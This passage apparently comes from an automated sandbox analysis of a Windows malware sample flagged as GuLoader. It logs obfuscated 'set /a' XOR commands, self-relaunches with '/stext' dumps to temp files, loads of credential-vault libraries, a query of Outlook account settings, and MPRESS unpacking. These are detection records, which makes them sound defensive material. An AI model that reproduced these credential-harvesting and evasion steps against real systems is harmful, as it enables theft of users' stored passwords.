              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\yiydflrlgx"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\lmosdawqehkmlcbfmkivthwvnjpkkkqrhv"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\wotkesh"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\yiydflrlgx"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: msi.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: msi.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: version.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: edgegdi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: wldp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: pstorec.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: vaultcli.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: wintypes.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: dpapi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: edgegdi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: wldp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: pstorec.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: sspicli.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: edgegdi.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: wldp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: sspicli.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\Desktop\asXlZG3aW6.cfg
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: asXlZG3aW6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeUnpacked PE file: 131.2.asXlZG3aW6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeUnpacked PE file: 132.2.asXlZG3aW6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeUnpacked PE file: 133.2.asXlZG3aW6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Yara detected GuLoader
              Source: Yara matchFile source: 00000000.00000002.21761784338.0000000004742000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
